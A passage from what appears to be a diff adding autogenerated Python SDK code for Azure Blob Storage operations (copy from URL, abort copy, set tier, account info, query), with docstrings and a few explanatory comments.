response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', 
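+ # True when the request contents were encrypted server-side with the
+ # algorithm specified on the request.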
response.headers.get('x-ms-request-server-encrypted')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create_snapshot.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def start_copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_source, # type: str + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + tier=None, # type: Optional[Union[str, "_models.AccessTierOptional"]] + rehydrate_priority=None, # type: Optional[Union[str, "_models.RehydratePriority"]] + request_id_parameter=None, # type: Optional[str] + blob_tags_string=None, # type: Optional[str] + seal_blob=None, # type: Optional[bool] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Start Copy From URL operation copies a blob or an internet resource to a new blob. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param rehydrate_priority: Optional: Indicates the priority with which to rehydrate an archived + blob. Default value is None. + :type rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param seal_blob: Overrides the sealed state of the destination blob. Service version + 2019-12-12 and newer. Default value is None. 
+ :type seal_blob: bool + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _source_if_tags = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + _source_if_tags = source_modified_access_conditions.source_if_tags + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_start_copy_from_url_request( + url=self._config.url, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + metadata=metadata, + tier=tier, + rehydrate_priority=rehydrate_priority, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + source_if_tags=_source_if_tags, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + seal_blob=seal_blob, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + 
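+ # template_url binds this request to the {url}/{containerName}/{blob} path
+ # pattern recorded in start_copy_from_url.metadata below.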
template_url=self.start_copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + start_copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_source, # type: str + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + tier=None, # type: Optional[Union[str, "_models.AccessTierOptional"]] + request_id_parameter=None, # type: Optional[str] + source_content_md5=None, # type: Optional[bytearray] + blob_tags_string=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + copy_source_authorization=None, # type: Optional[str] + copy_source_tags=None, # type: Optional[Union[str, "_models.BlobCopySourceTags"]] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Copy From URL operation copies a blob or an internet resource to a new blob. It will not + return a response until the copy is complete. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. 
+ :type timeout: int
+ :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob.
+ If no name-value pairs are specified, the operation will copy the metadata from the source blob
+ or file to the destination blob. If one or more name-value pairs are specified, the destination
+ blob is created with the specified metadata, and metadata is not copied from the source blob or
+ file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming
+ rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more
+ information. Default value is None.
+ :type metadata: dict[str, str]
+ :param tier: Optional. Indicates the tier to be set on the blob. Default value is None.
+ :type tier: str or ~azure.storage.blob.models.AccessTierOptional
+ :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
+ limit that is recorded in the analytics logs when storage analytics logging is enabled. Default
+ value is None.
+ :type request_id_parameter: str
+ :param source_content_md5: Specify the MD5 hash calculated for the range of bytes that must be
+ read from the copy source. Default value is None.
+ :type source_content_md5: bytearray
+ :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default
+ value is None.
+ :type blob_tags_string: str
+ :param immutability_policy_expiry: Specifies the date and time when the blob's immutability
+ policy is set to expire. Default value is None.
+ :type immutability_policy_expiry: ~datetime.datetime
+ :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob.
+ Default value is None.
+ :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode
+ :param legal_hold: Specifies whether a legal hold should be set on the blob. Default value is
+ None.
+ :type legal_hold: bool
+ :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid
+ OAuth access token to copy source. Default value is None.
+ :type copy_source_authorization: str
+ :param copy_source_tags: Optional, default 'replace'. Indicates whether source tags should be
+ copied or replaced with the tags specified by x-ms-tags. Default value is None.
+ :type copy_source_tags: str or ~azure.storage.blob.models.BlobCopySourceTags
+ :param source_modified_access_conditions: Parameter group. Default value is None.
+ :type source_modified_access_conditions:
+ ~azure.storage.blob.models.SourceModifiedAccessConditions
+ :param modified_access_conditions: Parameter group. Default value is None.
+ :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
+ :param lease_access_conditions: Parameter group. Default value is None.
+ :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
+ :param cpk_scope_info: Parameter group. Default value is None.
+ :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo
+ :keyword x_ms_requires_sync: This header indicates that this is a synchronous Copy Blob From
+ URL instead of an Asynchronous Copy Blob. Default value is "true". Note that overriding this
+ default value may result in unsupported behavior.
+ :paramtype x_ms_requires_sync: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + x_ms_requires_sync = kwargs.pop('x_ms_requires_sync', "true") # type: str + + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + _encryption_scope = None + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + + request = build_copy_from_url_request( + url=self._config.url, + x_ms_requires_sync=x_ms_requires_sync, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + metadata=metadata, + tier=tier, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + source_content_md5=source_content_md5, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + copy_source_authorization=copy_source_authorization, + encryption_scope=_encryption_scope, + copy_source_tags=copy_source_tags, + template_url=self.copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + 
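+ # This is the synchronous copy path: by the time the service answers 202 the
+ # copy has already completed, so x-ms-copy-status below should read "success".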
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def abort_copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Abort Copy From URL operation aborts a pending Copy From URL operation, and leaves a + destination blob with zero length and full metadata. + + :param copy_id: The copy identifier provided in the x-ms-copy-id header of the original Copy + Blob operation. + :type copy_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "copy". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword copy_action_abort_constant: Copy action. Default value is "abort". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype copy_action_abort_constant: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "copy") # type: str + copy_action_abort_constant = kwargs.pop('copy_action_abort_constant', "abort") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_abort_copy_from_url_request( + url=self._config.url, + comp=comp, + copy_action_abort_constant=copy_action_abort_constant, + version=self._config.version, + copy_id=copy_id, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.abort_copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [204]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + abort_copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def set_tier( # pylint: disable=inconsistent-return-statements + self, + tier, # type: Union[str, "_models.AccessTierRequired"] + snapshot=None, # type: Optional[str] + version_id=None, # type: Optional[str] + timeout=None, # type: Optional[int] + rehydrate_priority=None, # type: Optional[Union[str, "_models.RehydratePriority"]] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Set Tier operation sets the tier on a blob. The operation is allowed on a page blob in a + premium storage account and on a block blob in a blob storage account (locally redundant + storage only). A premium page blob's tier determines the allowed size, IOPS, and bandwidth of + the blob. A block blob's tier determines Hot/Cool/Archive storage type. This operation does not + update the blob's ETag. + + :param tier: Indicates the tier to be set on the blob. + :type tier: str or ~azure.storage.blob.models.AccessTierRequired + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. 
For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param rehydrate_priority: Optional: Indicates the priority with which to rehydrate an archived + blob. Default value is None. + :type rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "tier". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tier") # type: str + + _lease_id = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + + request = build_set_tier_request( + url=self._config.url, + comp=comp, + version=self._config.version, + tier=tier, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + rehydrate_priority=rehydrate_priority, + request_id_parameter=request_id_parameter, + lease_id=_lease_id, + if_tags=_if_tags, + template_url=self.set_tier.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if response.status_code == 202: + 
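+ # A 200 response means the tier change took effect immediately (for example
+ # Hot <-> Cool on a block blob); a 202 means the request was accepted but
+ # completes asynchronously, such as a rehydration out of Archive.
+ # A minimal caller-side sketch using the public azure.storage.blob API
+ # (connection string, container and blob names are placeholders):
+ #
+ #     from azure.storage.blob import BlobClient
+ #     blob = BlobClient.from_connection_string(conn_str, "mycontainer", "myblob")
+ #     blob.set_standard_blob_tier("Cool")  # drives this set_tier operation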
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_tier.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs # type: Any + ): + # type: (...) -> None + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def query( + self, + snapshot=None, # type: Optional[str] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + query_request=None, # type: Optional["_models.QueryRequest"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: 
(...) -> IO + """The Query operation enables users to select/project on blob data by providing simple query + expressions. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param query_request: the query request. Default value is None. + :type query_request: ~azure.storage.blob.models.QueryRequest + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "query". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "query") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if query_request is not None: + _content = self._serialize.body(query_request, 'QueryRequest', is_xml=True) + else: + _content = None + + request = build_query_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + snapshot=snapshot, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + 
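+ # The modified-access values gathered above travel as standard HTTP
+ # preconditions (If-Match / If-None-Match / x-ms-if-tags), so a query can be
+ # made race-safe against concurrent writers; the service answers 412 when a
+ # precondition fails. A sketch of a conditional call through the public
+ # client, assuming the usual azure-core keyword pattern (names are
+ # placeholders):
+ #
+ #     from azure.core import MatchConditions
+ #     props = blob_client.get_blob_properties()
+ #     reader = blob_client.query_blob("SELECT * FROM BlobStorage",
+ #         etag=props.etag, match_condition=MatchConditions.IfNotModified)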
if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.query.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 206]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', 